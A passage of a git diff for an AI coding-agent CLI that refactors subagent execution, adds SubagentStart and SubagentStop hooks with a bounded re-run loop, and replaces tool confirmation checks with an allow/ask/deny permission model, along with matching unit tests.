from this base directory when working with skills.\n\n${skill.body}\n`; + const llmContent = buildSkillLlmContent(baseDir, skill.body); return { llmContent: [{ text: llmContent }], diff --git a/packages/core/src/tools/task.test.ts b/packages/core/src/tools/task.test.ts index 458b026b6..362dab13f 100644 --- a/packages/core/src/tools/task.test.ts +++ b/packages/core/src/tools/task.test.ts @@ -10,12 +10,15 @@ import type { PartListUnion } from '@google/genai'; import type { ToolResultDisplay, TaskResultDisplay } from './tools.js'; import type { Config } from '../config/config.js'; import { SubagentManager } from '../subagents/subagent-manager.js'; +import type { SubagentConfig } from '../subagents/types.js'; +import { AgentTerminateMode } from '../agents/runtime/agent-types.js'; import { - type SubagentConfig, - SubagentTerminateMode, -} from '../subagents/types.js'; -import { type SubAgentScope, ContextState } from '../subagents/subagent.js'; + type AgentHeadless, + ContextState, +} from '../agents/runtime/agent-headless.js'; import { partToString } from '../utils/partUtils.js'; +import type { HookSystem } from '../hooks/hookSystem.js'; +import { PermissionMode } from '../hooks/types.js'; // Type for accessing protected methods in tests type TaskToolWithProtectedMethods = TaskTool & { @@ -28,13 +31,12 @@ type TaskToolWithProtectedMethods = TaskTool & { returnDisplay: ToolResultDisplay; }>; getDescription: () => string; - shouldConfirmExecute: () => Promise; }; }; // Mock dependencies vi.mock('../subagents/subagent-manager.js'); -vi.mock('../subagents/subagent.js'); +vi.mock('../agents/runtime/agent-headless.js'); const MockedSubagentManager = vi.mocked(SubagentManager); const MockedContextState = vi.mocked(ContextState); @@ -72,6 +74,8 @@ describe('TaskTool', () => { getSessionId: vi.fn().mockReturnValue('test-session-id'), getSubagentManager: vi.fn(), getGeminiClient: vi.fn().mockReturnValue(undefined), + getHookSystem: vi.fn().mockReturnValue(undefined), + getTranscriptPath: vi.fn().mockReturnValue('/test/transcript'), } as unknown as Config; changeListeners = []; @@ -80,7 +84,7 @@ describe('TaskTool', () => { mockSubagentManager = { listSubagents: vi.fn().mockResolvedValue(mockSubagents), loadSubagent: vi.fn(), - createSubagentScope: vi.fn(), + createAgentHeadless: vi.fn(), addChangeListener: vi.fn((listener: () => void) => { changeListeners.push(listener); return () => { @@ -293,14 +297,14 @@ describe('TaskTool', () => { }); describe('TaskToolInvocation', () => { - let mockSubagentScope: SubAgentScope; + let mockAgent: AgentHeadless; let mockContextState: ContextState; beforeEach(() => { - mockSubagentScope = { - runNonInteractive: vi.fn().mockResolvedValue(undefined), + mockAgent = { + execute: vi.fn().mockResolvedValue(undefined), result: 'Task completed successfully', - terminateMode: SubagentTerminateMode.GOAL, + terminateMode: AgentTerminateMode.GOAL, getFinalText: vi.fn().mockReturnValue('Task completed successfully'), formatCompactResult: vi .fn() @@ -317,7 +321,6 @@ describe('TaskTool', () => { inputTokens: 1000, outputTokens: 500, totalTokens: 1500, - estimatedCost: 0.045, toolUsage: [ { name: 'grep', @@ -344,8 +347,8 @@ describe('TaskTool', () => { successfulToolCalls: 3, failedToolCalls: 0, }), - getTerminateMode: vi.fn().mockReturnValue(SubagentTerminateMode.GOAL), - } as unknown as SubAgentScope; + getTerminateMode: vi.fn().mockReturnValue(AgentTerminateMode.GOAL), + } as unknown as AgentHeadless; mockContextState = { set: vi.fn(), @@ -356,8 +359,8 @@ describe('TaskTool', () => { vi.mocked(mockSubagentManager.loadSubagent).mockResolvedValue( mockSubagents[0], ); - vi.mocked(mockSubagentManager.createSubagentScope).mockResolvedValue( - mockSubagentScope, + vi.mocked(mockSubagentManager.createAgentHeadless).mockResolvedValue( + mockAgent, ); }); @@ -376,12 +379,12 @@ describe('TaskTool', () => { expect(mockSubagentManager.loadSubagent).toHaveBeenCalledWith( 'file-search', ); - expect(mockSubagentManager.createSubagentScope).toHaveBeenCalledWith( + expect(mockSubagentManager.createAgentHeadless).toHaveBeenCalledWith( mockSubagents[0], config, expect.any(Object), // eventEmitter parameter ); - expect(mockSubagentScope.runNonInteractive).toHaveBeenCalledWith( + expect(mockAgent.execute).toHaveBeenCalledWith( mockContextState, undefined, // signal parameter (undefined when not provided) ); @@ -416,7 +419,7 @@ describe('TaskTool', () => { }); it('should handle execution errors gracefully', async () => { - vi.mocked(mockSubagentManager.createSubagentScope).mockRejectedValue( + vi.mocked(mockSubagentManager.createAgentHeadless).mockRejectedValue( new Error('Creation failed'), ); @@ -515,9 +518,9 @@ describe('TaskTool', () => { const invocation = ( taskTool as TaskToolWithProtectedMethods ).createInvocation(params); - const shouldConfirm = await invocation.shouldConfirmExecute(); + const permission = await invocation.getDefaultPermission(); - expect(shouldConfirm).toBe(false); + expect(permission).toBe('allow'); }); it('should provide correct description', async () => { @@ -535,4 +538,464 @@ describe('TaskTool', () => { expect(description).toBe('file-search subagent: "Search files"'); }); }); + + describe('SubagentStart hook integration', () => { + let mockAgent: AgentHeadless; + let mockContextState: ContextState; + let mockHookSystem: HookSystem; + + beforeEach(() => { + mockAgent = { + execute: vi.fn().mockResolvedValue(undefined), + result: 'Task completed successfully', + terminateMode: AgentTerminateMode.GOAL, + getFinalText: vi.fn().mockReturnValue('Task completed successfully'), + formatCompactResult: vi.fn().mockReturnValue('✅ Success'), + getExecutionSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + successfulToolCalls: 1, + failedToolCalls: 0, + successRate: 100, + inputTokens: 100, + outputTokens: 50, + totalTokens: 150, + estimatedCost: 0.01, + toolUsage: [], + }), + getStatistics: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + successfulToolCalls: 1, + failedToolCalls: 0, + }), + getTerminateMode: vi.fn().mockReturnValue(AgentTerminateMode.GOAL), + } as unknown as AgentHeadless; + + mockContextState = { + set: vi.fn(), + } as unknown as ContextState; + + MockedContextState.mockImplementation(() => mockContextState); + + vi.mocked(mockSubagentManager.loadSubagent).mockResolvedValue( + mockSubagents[0], + ); + vi.mocked(mockSubagentManager.createAgentHeadless).mockResolvedValue( + mockAgent, + ); + + mockHookSystem = { + fireSubagentStartEvent: vi.fn().mockResolvedValue(undefined), + fireSubagentStopEvent: vi.fn().mockResolvedValue(undefined), + } as unknown as HookSystem; + + vi.mocked(config.getGeminiClient).mockReturnValue(undefined as never); + (config as unknown as Record)['getHookSystem'] = vi + .fn() + .mockReturnValue(mockHookSystem); + (config as unknown as Record)['getTranscriptPath'] = vi + .fn() + .mockReturnValue('/test/transcript'); + }); + + it('should call fireSubagentStartEvent before execution', async () => { + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockHookSystem.fireSubagentStartEvent).toHaveBeenCalledWith( + expect.stringContaining('file-search-'), + 'file-search', + PermissionMode.Default, + ); + }); + + it('should inject additionalContext from SubagentStart hook into context', async () => { + const mockStartOutput = { + getAdditionalContext: vi + .fn() + .mockReturnValue('Extra context from hook'), + }; + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockResolvedValue( + mockStartOutput as never, + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockContextState.set).toHaveBeenCalledWith( + 'hook_context', + 'Extra context from hook', + ); + }); + + it('should not inject hook_context when additionalContext is undefined', async () => { + const mockStartOutput = { + getAdditionalContext: vi.fn().mockReturnValue(undefined), + }; + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockResolvedValue( + mockStartOutput as never, + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockContextState.set).not.toHaveBeenCalledWith( + 'hook_context', + expect.anything(), + ); + }); + + it('should continue execution when SubagentStart hook fails', async () => { + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockRejectedValue( + new Error('Hook failed'), + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + const result = await invocation.execute(); + + // Should still complete successfully despite hook failure + const llmText = partToString(result.llmContent); + expect(llmText).toBe('Task completed successfully'); + const display = result.returnDisplay as TaskResultDisplay; + expect(display.status).toBe('completed'); + }); + + it('should skip hooks when hookSystem is not available', async () => { + (config as unknown as Record)['getHookSystem'] = vi + .fn() + .mockReturnValue(undefined); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + const result = await invocation.execute(); + + expect(mockHookSystem.fireSubagentStartEvent).not.toHaveBeenCalled(); + const llmText = partToString(result.llmContent); + expect(llmText).toBe('Task completed successfully'); + }); + }); + + describe('SubagentStop hook integration', () => { + let mockAgent: AgentHeadless; + let mockContextState: ContextState; + let mockHookSystem: HookSystem; + + beforeEach(() => { + mockAgent = { + execute: vi.fn().mockResolvedValue(undefined), + result: 'Task completed successfully', + terminateMode: AgentTerminateMode.GOAL, + getFinalText: vi.fn().mockReturnValue('Task completed successfully'), + formatCompactResult: vi.fn().mockReturnValue('✅ Success'), + getExecutionSummary: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + successfulToolCalls: 1, + failedToolCalls: 0, + successRate: 100, + inputTokens: 100, + outputTokens: 50, + totalTokens: 150, + estimatedCost: 0.01, + toolUsage: [], + }), + getStatistics: vi.fn().mockReturnValue({ + rounds: 1, + totalDurationMs: 500, + totalToolCalls: 1, + successfulToolCalls: 1, + failedToolCalls: 0, + }), + getTerminateMode: vi.fn().mockReturnValue(AgentTerminateMode.GOAL), + } as unknown as AgentHeadless; + + mockContextState = { + set: vi.fn(), + } as unknown as ContextState; + + MockedContextState.mockImplementation(() => mockContextState); + + vi.mocked(mockSubagentManager.loadSubagent).mockResolvedValue( + mockSubagents[0], + ); + vi.mocked(mockSubagentManager.createAgentHeadless).mockResolvedValue( + mockAgent, + ); + + mockHookSystem = { + fireSubagentStartEvent: vi.fn().mockResolvedValue(undefined), + fireSubagentStopEvent: vi.fn().mockResolvedValue(undefined), + } as unknown as HookSystem; + + vi.mocked(config.getGeminiClient).mockReturnValue(undefined as never); + (config as unknown as Record)['getHookSystem'] = vi + .fn() + .mockReturnValue(mockHookSystem); + (config as unknown as Record)['getTranscriptPath'] = vi + .fn() + .mockReturnValue('/test/transcript'); + }); + + it('should call fireSubagentStopEvent after execution', async () => { + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockHookSystem.fireSubagentStopEvent).toHaveBeenCalledWith( + expect.stringContaining('file-search-'), + 'file-search', + '/test/transcript', + 'Task completed successfully', + false, + PermissionMode.Default, + ); + }); + + it('should re-execute subagent when stop hook returns blocking decision', async () => { + const mockBlockOutput = { + isBlockingDecision: vi + .fn() + .mockReturnValueOnce(true) + .mockReturnValueOnce(false), + shouldStopExecution: vi.fn().mockReturnValue(false), + getEffectiveReason: vi + .fn() + .mockReturnValue('Continue working on the task'), + }; + + // First call returns block, second call returns allow (no output) + vi.mocked(mockHookSystem.fireSubagentStopEvent) + .mockResolvedValueOnce(mockBlockOutput as never) + .mockResolvedValueOnce(undefined as never); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + // Should have called execute twice (initial + re-execution) + expect(mockAgent.execute).toHaveBeenCalledTimes(2); + // Stop hook should have been called twice + expect(mockHookSystem.fireSubagentStopEvent).toHaveBeenCalledTimes(2); + // Second call should have stopHookActive=true + expect(mockHookSystem.fireSubagentStopEvent).toHaveBeenNthCalledWith( + 2, + expect.stringContaining('file-search-'), + 'file-search', + '/test/transcript', + 'Task completed successfully', + true, + PermissionMode.Default, + ); + }); + + it('should re-execute subagent when stop hook returns shouldStopExecution', async () => { + const mockStopOutput = { + isBlockingDecision: vi.fn().mockReturnValue(false), + shouldStopExecution: vi.fn().mockReturnValueOnce(true), + getEffectiveReason: vi.fn().mockReturnValue('Output is incomplete'), + }; + + vi.mocked(mockHookSystem.fireSubagentStopEvent) + .mockResolvedValueOnce(mockStopOutput as never) + .mockResolvedValueOnce(undefined as never); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(mockAgent.execute).toHaveBeenCalledTimes(2); + }); + + it('should allow stop when SubagentStop hook fails', async () => { + vi.mocked(mockHookSystem.fireSubagentStopEvent).mockRejectedValue( + new Error('Stop hook failed'), + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + const result = await invocation.execute(); + + // Should still complete successfully despite hook failure + const llmText = partToString(result.llmContent); + expect(llmText).toBe('Task completed successfully'); + const display = result.returnDisplay as TaskResultDisplay; + expect(display.status).toBe('completed'); + }); + + it('should skip SubagentStop hook when signal is aborted', async () => { + const abortController = new AbortController(); + abortController.abort(); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(abortController.signal); + + expect(mockHookSystem.fireSubagentStopEvent).not.toHaveBeenCalled(); + }); + + it('should stop re-execution loop when signal is aborted during block handling', async () => { + const abortController = new AbortController(); + + const mockBlockOutput = { + isBlockingDecision: vi.fn().mockReturnValue(true), + shouldStopExecution: vi.fn().mockReturnValue(false), + getEffectiveReason: vi.fn().mockReturnValue('Keep working'), + }; + + vi.mocked(mockHookSystem.fireSubagentStopEvent).mockResolvedValue( + mockBlockOutput as never, + ); + + // Abort after first re-execution + vi.mocked(mockAgent.execute).mockImplementation(async () => { + const callCount = vi.mocked(mockAgent.execute).mock.calls.length; + if (callCount >= 2) { + abortController.abort(); + } + }); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(abortController.signal); + + // Should have stopped the loop after abort + expect(mockAgent.execute).toHaveBeenCalledTimes(2); + }); + + it('should call both start and stop hooks in correct order', async () => { + const callOrder: string[] = []; + + vi.mocked(mockHookSystem.fireSubagentStartEvent).mockImplementation( + async () => { + callOrder.push('start'); + return undefined; + }, + ); + vi.mocked(mockHookSystem.fireSubagentStopEvent).mockImplementation( + async () => { + callOrder.push('stop'); + return undefined; + }, + ); + + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + expect(callOrder).toEqual(['start', 'stop']); + }); + + it('should pass consistent agentId to both start and stop hooks', async () => { + const params: TaskParams = { + description: 'Search files', + prompt: 'Find all TypeScript files', + subagent_type: 'file-search', + }; + + const invocation = ( + taskTool as TaskToolWithProtectedMethods + ).createInvocation(params); + await invocation.execute(); + + const startAgentId = vi.mocked(mockHookSystem.fireSubagentStartEvent).mock + .calls[0]?.[0] as string; + const stopAgentId = vi.mocked(mockHookSystem.fireSubagentStopEvent).mock + .calls[0]?.[0] as string; + + expect(startAgentId).toBe(stopAgentId); + expect(startAgentId).toMatch(/^file-search-\d+$/); + }); + }); }); diff --git a/packages/core/src/tools/task.ts b/packages/core/src/tools/task.ts index e811dde0d..974a4b41a 100644 --- a/packages/core/src/tools/task.ts +++ b/packages/core/src/tools/task.ts @@ -18,23 +18,23 @@ import type { } from './tools.js'; import type { Config } from '../config/config.js'; import type { SubagentManager } from '../subagents/subagent-manager.js'; +import type { SubagentConfig } from '../subagents/types.js'; +import { AgentTerminateMode } from '../agents/runtime/agent-types.js'; +import { ContextState } from '../agents/runtime/agent-headless.js'; import { - type SubagentConfig, - SubagentTerminateMode, -} from '../subagents/types.js'; -import { ContextState } from '../subagents/subagent.js'; -import { - SubAgentEventEmitter, - SubAgentEventType, -} from '../subagents/subagent-events.js'; + AgentEventEmitter, + AgentEventType, +} from '../agents/runtime/agent-events.js'; import type { - SubAgentToolCallEvent, - SubAgentToolResultEvent, - SubAgentFinishEvent, - SubAgentErrorEvent, - SubAgentApprovalRequestEvent, -} from '../subagents/subagent-events.js'; + AgentToolCallEvent, + AgentToolResultEvent, + AgentFinishEvent, + AgentErrorEvent, + AgentApprovalRequestEvent, +} from '../agents/runtime/agent-events.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { PermissionMode } from '../hooks/types.js'; +import type { StopHookOutput } from '../hooks/types.js'; export interface TaskParams { description: string; @@ -54,6 +54,7 @@ export class TaskTool extends BaseDeclarativeTool { private subagentManager: SubagentManager; private availableSubagents: SubagentConfig[] = []; + private readonly removeChangeListener: () => void; constructor(private readonly config: Config) { // Initialize with a basic schema first @@ -89,7 +90,7 @@ export class TaskTool extends BaseDeclarativeTool { ); this.subagentManager = config.getSubagentManager(); - this.subagentManager.addChangeListener(() => { + this.removeChangeListener = this.subagentManager.addChangeListener(() => { void this.refreshSubagents(); }); @@ -97,6 +98,10 @@ export class TaskTool extends BaseDeclarativeTool { this.refreshSubagents(); } + dispose(): void { + this.removeChangeListener(); + } + /** * Asynchronously initializes the tool by loading available subagents * and updating the description and schema. @@ -262,7 +267,7 @@ assistant: "I'm going to use the Task tool to launch the with the greeting-respo } class TaskToolInvocation extends BaseToolInvocation { - private readonly _eventEmitter: SubAgentEventEmitter; + readonly eventEmitter: AgentEventEmitter = new AgentEventEmitter(); private currentDisplay: TaskResultDisplay | null = null; private currentToolCalls: TaskResultDisplay['toolCalls'] = []; @@ -272,11 +277,6 @@ class TaskToolInvocation extends BaseToolInvocation { params: TaskParams, ) { super(params); - this._eventEmitter = new SubAgentEventEmitter(); - } - - get eventEmitter(): SubAgentEventEmitter { - return this._eventEmitter; } /** @@ -304,12 +304,12 @@ class TaskToolInvocation extends BaseToolInvocation { private setupEventListeners( updateOutput?: (output: ToolResultDisplay) => void, ): void { - this.eventEmitter.on(SubAgentEventType.START, () => { + this.eventEmitter.on(AgentEventType.START, () => { this.updateDisplay({ status: 'running' }, updateOutput); }); - this.eventEmitter.on(SubAgentEventType.TOOL_CALL, (...args: unknown[]) => { - const event = args[0] as SubAgentToolCallEvent; + this.eventEmitter.on(AgentEventType.TOOL_CALL, (...args: unknown[]) => { + const event = args[0] as AgentToolCallEvent; const newToolCall = { callId: event.callId, name: event.name, @@ -327,33 +327,30 @@ class TaskToolInvocation extends BaseToolInvocation { ); }); - this.eventEmitter.on( - SubAgentEventType.TOOL_RESULT, - (...args: unknown[]) => { - const event = args[0] as SubAgentToolResultEvent; - const toolCallIndex = this.currentToolCalls!.findIndex( - (call) => call.callId === event.callId, + this.eventEmitter.on(AgentEventType.TOOL_RESULT, (...args: unknown[]) => { + const event = args[0] as AgentToolResultEvent; + const toolCallIndex = this.currentToolCalls!.findIndex( + (call) => call.callId === event.callId, + ); + if (toolCallIndex >= 0) { + this.currentToolCalls![toolCallIndex] = { + ...this.currentToolCalls![toolCallIndex], + status: event.success ? 'success' : 'failed', + error: event.error, + responseParts: event.responseParts, + }; + + this.updateDisplay( + { + toolCalls: [...this.currentToolCalls!], + }, + updateOutput, ); - if (toolCallIndex >= 0) { - this.currentToolCalls![toolCallIndex] = { - ...this.currentToolCalls![toolCallIndex], - status: event.success ? 'success' : 'failed', - error: event.error, - responseParts: event.responseParts, - }; + } + }); - this.updateDisplay( - { - toolCalls: [...this.currentToolCalls!], - }, - updateOutput, - ); - } - }, - ); - - this.eventEmitter.on(SubAgentEventType.FINISH, (...args: unknown[]) => { - const event = args[0] as SubAgentFinishEvent; + this.eventEmitter.on(AgentEventType.FINISH, (...args: unknown[]) => { + const event = args[0] as AgentFinishEvent; this.updateDisplay( { status: event.terminateReason === 'GOAL' ? 'completed' : 'failed', @@ -363,8 +360,8 @@ class TaskToolInvocation extends BaseToolInvocation { ); }); - this.eventEmitter.on(SubAgentEventType.ERROR, (...args: unknown[]) => { - const event = args[0] as SubAgentErrorEvent; + this.eventEmitter.on(AgentEventType.ERROR, (...args: unknown[]) => { + const event = args[0] as AgentErrorEvent; this.updateDisplay( { status: 'failed', @@ -376,9 +373,9 @@ class TaskToolInvocation extends BaseToolInvocation { // Indicate when a tool call is waiting for approval this.eventEmitter.on( - SubAgentEventType.TOOL_WAITING_APPROVAL, + AgentEventType.TOOL_WAITING_APPROVAL, (...args: unknown[]) => { - const event = args[0] as SubAgentApprovalRequestEvent; + const event = args[0] as AgentApprovalRequestEvent; const idx = this.currentToolCalls!.findIndex( (c) => c.callId === event.callId, ); @@ -413,6 +410,8 @@ class TaskToolInvocation extends BaseToolInvocation { ToolConfirmationOutcome.ProceedAlways, ToolConfirmationOutcome.ProceedAlwaysServer, ToolConfirmationOutcome.ProceedAlwaysTool, + ToolConfirmationOutcome.ProceedAlwaysProject, + ToolConfirmationOutcome.ProceedAlwaysUser, ]); if (proceedOutcomes.has(outcome)) { @@ -458,11 +457,6 @@ class TaskToolInvocation extends BaseToolInvocation { return `${this.params.subagent_type} subagent: "${this.params.description}"`; } - override async shouldConfirmExecute(): Promise { - // Task delegation should execute automatically without user confirmation - return false; - } - async execute( signal?: AbortSignal, updateOutput?: (output: ToolResultDisplay) => void, @@ -506,7 +500,7 @@ class TaskToolInvocation extends BaseToolInvocation { if (updateOutput) { updateOutput(this.currentDisplay); } - const subagentScope = await this.subagentManager.createSubagentScope( + const subagent = await this.subagentManager.createAgentHeadless( subagentConfig, this.config, { eventEmitter: this.eventEmitter }, @@ -516,14 +510,103 @@ class TaskToolInvocation extends BaseToolInvocation { const contextState = new ContextState(); contextState.set('task_prompt', this.params.prompt); + // Fire SubagentStart hook before execution + const hookSystem = this.config.getHookSystem(); + const agentId = `${subagentConfig.name}-${Date.now()}`; + const agentType = this.params.subagent_type; + + if (hookSystem) { + try { + const startHookOutput = await hookSystem.fireSubagentStartEvent( + agentId, + agentType, + PermissionMode.Default, + ); + + // Inject additional context from hook output into subagent context + const additionalContext = startHookOutput?.getAdditionalContext(); + if (additionalContext) { + contextState.set('hook_context', additionalContext); + } + } catch (hookError) { + debugLogger.warn( + `[TaskTool] SubagentStart hook failed, continuing execution: ${hookError}`, + ); + } + } + // Execute the subagent (blocking) - await subagentScope.runNonInteractive(contextState, signal); + await subagent.execute(contextState, signal); + + // Fire SubagentStop hook after execution and handle block decisions + if (hookSystem && !signal?.aborted) { + const transcriptPath = this.config.getTranscriptPath(); + let stopHookActive = false; + + // Loop to handle "block" decisions (prevent subagent from stopping) + let continueExecution = true; + let iterationCount = 0; + const maxIterations = 5; // Prevent infinite loops from hook misconfigurations + + while (continueExecution) { + iterationCount++; + + // Safety check to prevent infinite loops + if (iterationCount >= maxIterations) { + debugLogger.warn( + `[TaskTool] SubagentStop hook reached maximum iterations (${maxIterations}), forcing stop to prevent infinite loop`, + ); + continueExecution = false; + break; + } + + try { + const stopHookOutput = await hookSystem.fireSubagentStopEvent( + agentId, + agentType, + transcriptPath, + subagent.getFinalText(), + stopHookActive, + PermissionMode.Default, + ); + + const typedStopOutput = stopHookOutput as + | StopHookOutput + | undefined; + + if ( + typedStopOutput?.isBlockingDecision() || + typedStopOutput?.shouldStopExecution() + ) { + // Feed the reason back to the subagent and continue execution + const continueReason = typedStopOutput.getEffectiveReason(); + stopHookActive = true; + + const continueContext = new ContextState(); + continueContext.set('task_prompt', continueReason); + await subagent.execute(continueContext, signal); + + if (signal?.aborted) { + continueExecution = false; + } + // Loop continues to re-check SubagentStop hook + } else { + continueExecution = false; + } + } catch (hookError) { + debugLogger.warn( + `[TaskTool] SubagentStop hook failed, allowing stop: ${hookError}`, + ); + continueExecution = false; + } + } + } // Get the results - const finalText = subagentScope.getFinalText(); - const terminateMode = subagentScope.getTerminateMode(); - const success = terminateMode === SubagentTerminateMode.GOAL; - const executionSummary = subagentScope.getExecutionSummary(); + const finalText = subagent.getFinalText(); + const terminateMode = subagent.getTerminateMode(); + const success = terminateMode === AgentTerminateMode.GOAL; + const executionSummary = subagent.getExecutionSummary(); if (signal?.aborted) { this.updateDisplay( diff --git a/packages/core/src/tools/todoWrite.ts b/packages/core/src/tools/todoWrite.ts index f99fbccdd..2cdbafb51 100644 --- a/packages/core/src/tools/todoWrite.ts +++ b/packages/core/src/tools/todoWrite.ts @@ -313,13 +313,6 @@ class TodoWriteToolInvocation extends BaseToolInvocation< return this.operationType === 'create' ? 'Create todos' : 'Update todos'; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - // Todo operations should execute automatically without user confirmation - return false; - } - async execute(_signal: AbortSignal): Promise { const { todos, modified_by_user, modified_content } = this.params; const sessionId = this.config.getSessionId(); diff --git a/packages/core/src/tools/tool-registry.ts b/packages/core/src/tools/tool-registry.ts index 5fccddb4b..e2110810b 100644 --- a/packages/core/src/tools/tool-registry.ts +++ b/packages/core/src/tools/tool-registry.ts @@ -209,6 +209,22 @@ export class ToolRegistry { this.tools.set(tool.name, tool); } + /** + * Copies discovered (non-core) tools from another registry into this one. + * Used to share MCP/command-discovered tools with per-agent registries + * that were built with skipDiscovery. + */ + copyDiscoveredToolsFrom(source: ToolRegistry): void { + for (const tool of source.getAllTools()) { + if ( + (tool instanceof DiscoveredTool || tool instanceof DiscoveredMCPTool) && + !this.tools.has(tool.name) + ) { + this.tools.set(tool.name, tool); + } + } + } + private removeDiscoveredTools(): void { for (const tool of this.tools.values()) { if (tool instanceof DiscoveredTool || tool instanceof DiscoveredMCPTool) { @@ -527,10 +543,20 @@ export class ToolRegistry { } /** - * Stops all MCP clients and cleans up resources. + * Stops all MCP clients, disposes tools, and cleans up resources. * This method is idempotent and safe to call multiple times. */ async stop(): Promise { + for (const tool of this.tools.values()) { + if ('dispose' in tool && typeof tool.dispose === 'function') { + try { + tool.dispose(); + } catch (error) { + debugLogger.error(`Error disposing tool ${tool.name}:`, error); + } + } + } + try { await this.mcpClientManager.stop(); } catch (error) { diff --git a/packages/core/src/tools/tools.test.ts b/packages/core/src/tools/tools.test.ts index 38827268c..244642e83 100644 --- a/packages/core/src/tools/tools.test.ts +++ b/packages/core/src/tools/tools.test.ts @@ -6,6 +6,7 @@ import { describe, it, expect, vi } from 'vitest'; import type { ToolInvocation, ToolResult } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { DeclarativeTool, hasCycleInSchema, Kind } from './tools.js'; import { ToolErrorType } from './tool-error.js'; @@ -23,8 +24,12 @@ class TestToolInvocation implements ToolInvocation { return []; } - shouldConfirmExecute(): Promise { - return Promise.resolve(false); + getDefaultPermission(): Promise { + return Promise.resolve('allow'); + } + + getConfirmationDetails(): Promise { + throw new Error('Not implemented'); } execute(): Promise { diff --git a/packages/core/src/tools/tools.ts b/packages/core/src/tools/tools.ts index 649b0cb4f..9e6f9f9bc 100644 --- a/packages/core/src/tools/tools.ts +++ b/packages/core/src/tools/tools.ts @@ -9,8 +9,9 @@ import { ToolErrorType } from './tool-error.js'; import type { DiffUpdateResult } from '../ide/ide-client.js'; import type { ShellExecutionConfig } from '../services/shellExecutionService.js'; import { SchemaValidator } from '../utils/schemaValidator.js'; -import { type SubagentStatsSummary } from '../subagents/subagent-statistics.js'; +import { type AgentStatsSummary } from '../agents/runtime/agent-statistics.js'; import type { AnsiOutput } from '../utils/terminalSerializer.js'; +import type { PermissionDecision } from '../permissions/types.js'; /** * Represents a validated and ready-to-execute tool call. @@ -39,12 +40,29 @@ export interface ToolInvocation< toolLocations(): ToolLocation[]; /** - * Determines if the tool should prompt for confirmation before execution. - * @returns Confirmation details or false if no confirmation is needed. + * Returns the tool's intrinsic permission for this invocation, based solely + * on its own parameters (without consulting PermissionManager). + * + * - `'allow'` — inherently safe (e.g., read-only commands, `cat`, `ls`). + * - `'ask'` — may have side effects, needs user or PM confirmation. + * - `'deny'` — security violation (e.g., command substitution in shell). + * + * The coreToolScheduler uses this as the *default* permission which may be + * overridden by PermissionManager rules at L4. */ - shouldConfirmExecute( + getDefaultPermission(): Promise; + + /** + * Constructs the confirmation dialog details for this invocation. + * Only called when the final permission decision is `'ask'` and the user + * needs to be prompted interactively. + * + * @param abortSignal Signal to cancel the operation. + * @returns The confirmation details for the UI to display. + */ + getConfirmationDetails( abortSignal: AbortSignal, - ): Promise; + ): Promise; /** * Executes the tool with the validated parameters. @@ -75,10 +93,37 @@ export abstract class BaseToolInvocation< return []; } - shouldConfirmExecute( + /** + * Default: read-only tools return 'allow'. Override in subclasses for + * tools with side effects. + */ + getDefaultPermission(): Promise { + return Promise.resolve('allow'); + } + + /** + * Default fallback: returns a generic 'info' confirmation dialog using the + * tool's getDescription(). This ensures that even tools whose + * getDefaultPermission() returns 'allow' can still be prompted when PM + * rules override the decision to 'ask' at L4. + * + * Tools with richer confirmation UIs (Shell, Edit, MCP, etc.) override this. + */ + getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { - return Promise.resolve(false); + ): Promise { + const details: ToolInfoConfirmationDetails = { + type: 'info', + title: `Confirm ${this.constructor.name.replace(/Invocation$/, '')}`, + prompt: this.getDescription(), + onConfirm: async ( + _outcome: ToolConfirmationOutcome, + _payload?: 